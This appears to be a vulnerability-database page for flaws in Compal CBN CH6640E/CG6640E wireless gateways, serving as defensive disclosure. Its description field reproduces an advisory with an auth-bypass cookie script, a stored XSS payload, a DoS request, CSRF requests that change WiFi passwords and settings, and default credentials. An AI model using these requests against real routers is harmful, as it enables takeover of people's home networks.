Search
Find a vulnerability
Search criteria
9 vulnerabilities by compal
VAR-201411-0178
Vulnerability from variot - Updated: 2025-04-13 23:14The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml. (1) xml/ of CmgwWirelessSecurity.xml (2) xml/ of DocsisConfigFile.xml (3) xml/ of CmgwBasicSetup.xml (4) basicDDNS.html (5) basicLanUsers.html (6) rootDesc.xml. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Cg6640e Wireless Gateway is prone to a information disclosure vulnerability. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.
--
document.cookie="userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable) GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0178",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks ch6640-3.5.11.7-nosh",
"scope": null,
"trust": 0.3,
"vendor": "compal",
"version": null
},
{
"model": "broadband networks ch664oe wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks cg6640e wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "77769"
}
],
"trust": 0.3
},
"cve": "CVE-2014-8655",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-8655",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-76600",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8655",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-8655",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-190",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76600",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml. (1) xml/ of CmgwWirelessSecurity.xml (2) xml/ of DocsisConfigFile.xml (3) xml/ of CmgwBasicSetup.xml (4) basicDDNS.html (5) basicLanUsers.html (6) rootDesc.xml. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Cg6640e Wireless Gateway is prone to a information disclosure vulnerability. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8655"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76600",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76600"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8655",
"trust": 3.5
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 2.9
},
{
"db": "BID",
"id": "70762",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 1.9
},
{
"db": "OSVDB",
"id": "113837",
"trust": 1.8
},
{
"db": "XF",
"id": "98331",
"trust": 0.9
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "BID",
"id": "77769",
"trust": 0.4
},
{
"db": "XF",
"id": "98328",
"trust": 0.1
},
{
"db": "XF",
"id": "98329",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113843",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113838",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113836",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113842",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113841",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113840",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113839",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-87381",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76600",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"id": "VAR-201411-0178",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.576000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.1,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 2.0,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.8,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98331"
},
{
"trust": 0.9,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/98331"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8655"
},
{
"trust": 0.7,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76600"
},
{
"db": "BID",
"id": "77769"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76600"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "77769"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"date": "2014-11-06T15:55:10.850000",
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-76600"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "77769"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005242"
},
{
"date": "2014-11-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-190"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8655"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Vulnerabilities that can bypass authentication in some firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005242"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-190"
}
],
"trust": 0.6
}
}
VAR-201411-0177
Vulnerability from variot - Updated: 2025-04-13 23:14Multiple cross-site request forgery (CSRF) vulnerabilities in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway hardware 1.0 with firmware CH6640-3.5.11.7-NOSH allow remote attackers to hijack the authentication of administrators for requests that (1) have unspecified impact on DDNS configuration via a request to basicDDNS.html, (2) change the wifi password via the psKey parameter to setWirelessSecurity.html, (3) add a static MAC address via the MacAddress parameter in an add_static action to setBasicDHCP1.html, or (4) enable or disable UPnP via the UPnP parameter in an apply action to setAdvancedOptions.html. (2) setWirelessSecurity.html of psKey Via parameters wifi The password is changed. (3) setBasicDHCP1.html of add_static In action MacAddress Static via parameters MAC An address is added. (4) setAdvancedOptions.html of apply Of UPnP Via parameters UPnP Is enabled or disabled. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Ch664oe Wireless Gateway is prone to a cross-site request forgery vulnerability. The 'UPnP' parameter in the apply action of the html page exploits this vulnerability to enable or disable UPnP. Product web page: http://www.icbn.com.tw Affected version: Model: CH6640 and CH6640E Hardware version: 1.0 Firmware version: CH6640-3.5.11.7-NOSH Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allow access gateway pages root/compalbn - Allow access gateway, provisioning pages and provide more configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
